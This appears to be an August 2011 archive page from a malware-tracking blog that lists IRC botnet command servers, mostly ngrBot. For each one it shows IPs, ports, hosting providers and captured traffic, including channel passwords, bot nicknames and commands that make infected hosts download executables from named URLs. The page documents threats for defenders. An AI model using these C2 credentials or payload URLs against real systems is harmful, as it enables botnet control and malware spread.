Month: August 2011

208.117.34.184(ngrBot hosted in United States Laird Hill Steadfast Networks)

Uncategorized

Remote Host Port Number 199.15.234.7 80 74.117.178.20 80 208.117.34.184 1888 PASS ngrBot NICK n{US|XPa}kttdoir USER kttdoir 0 0 :kttdoir JOIN ##center 1963.g3rb3rs1t0.3691 PRIVMSG ##center :[d=”http://dc243.4shared.com/download/_Ky9lkcy/fgds34.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataLdxaxl.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/208.117.34.184

81.166.35.193(ARYAN bot hosted in Norway As Altibox As)

Uncategorized

Remote Host Port Number 199.15.234.7 80 81.166.35.193 6667 PASS none NICK New{US-XP-x86}0661826 USER 0661826 “” “0661826” :0661826 MODE New{US-XP-x86}0661826 +iMm JOIN #xxARYANxx# zomgbotszomg PONG :bot.net hosting infos: http://whois.domaintools.com/81.166.35.193

irc.akanska.cjb.net (irc botnet hosted in United States San Jose Mochanin Corp)

Uncategorized

Remote Host Port Number 204.93.197.141 4244 NICK new[iRooT-XP-USA]865300 USER 6216 “” “TsGh” :6216 JOIN #!N!# AFK PRIVMSG #!N!# :[Botkiller] Searching for targets! Just a moment… 204.93.197.141:4244 Nick: new[iRooT-XP-AUT]574292 Username: 5742 Joined Channel: #!N!# with Password AFK Channel Topic for Channel #!N!#: “.Msn http://goo.gl/bJOJU” Private Message to User new[iRooT-XP-AUT]574292: “VERSION” hosting infos: http://whois.domaintools.com/204.93.197.141

cash.hi5fotos.info(ngrBot hosted in China Wuhan Niantong)

Uncategorized

Resolved : [cash.hi5fotos.info] To [61.31.99.67] Resolved : [cash.hi5fotos.info] To [64.69.44.51] Resolved : [cash.hi5fotos.info] To [58.19.130.52] Remote Host Port Number 195.122.131.7 80 199.15.234.7 80 64.62.243.90 80 58.19.130.52 4042 PASS ngrBot or PASS owned 64.69.44.51 4042 PASS ngrBot or PASS owned 61.31.99.67 4042 PASS ngrBot or PASS owned JOIN #US PRIVMSG #boss :[d=”http://tinyurl.com/434fj6q”] Error downloading file [e=”12039″]Read more...

204.188.231.133(ngrBot hosted in United States Missoula Sharktech Internet Services)

Uncategorized

Remote Host Port Number 199.15.234.7 80 82.165.102.141 80 204.188.231.133 19207 PASS ngrBot NICK n{US|XPa}jdkpmyd USER jdkpmyd 0 0 :jdkpmyd JOIN ##cybercenter## ngrBot PRIVMSG ##cybercenter## :[d=”http://www.cadelcucco.com/downloads/tmp3.exe” s=”172032 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataDcxaxd.exe” – Download retries: 0 * The data identified by the following URLs was then requested from the remote web server: oRead more...

unknownpredator.info(irc botnet hosted in Russian Federation Ispsystem Cjsc)

Uncategorized

Remote Host Port Number 188.120.254.57 8080 Remote Host Port Number 188.120.254.57 7777 PASS secret 199.15.234.7 80 NICK n{US|XPa}znogzpt USER znogzpt 0 0 :znogzpt JOIN #NGR bignut NICK *N*{GodBot}{XP-USA}907674 USER 0364 “” “TsGh” :0364 NICK {GodBot}{XP-USA}556449 USER 5564 “” “TsGh” :5564 JOIN ##Bots gtfo Remote Host Port Number 188.120.254.57 1234 PASS .. 199.15.234.7 80 NICK n{US|XPa}zqohkznRead more...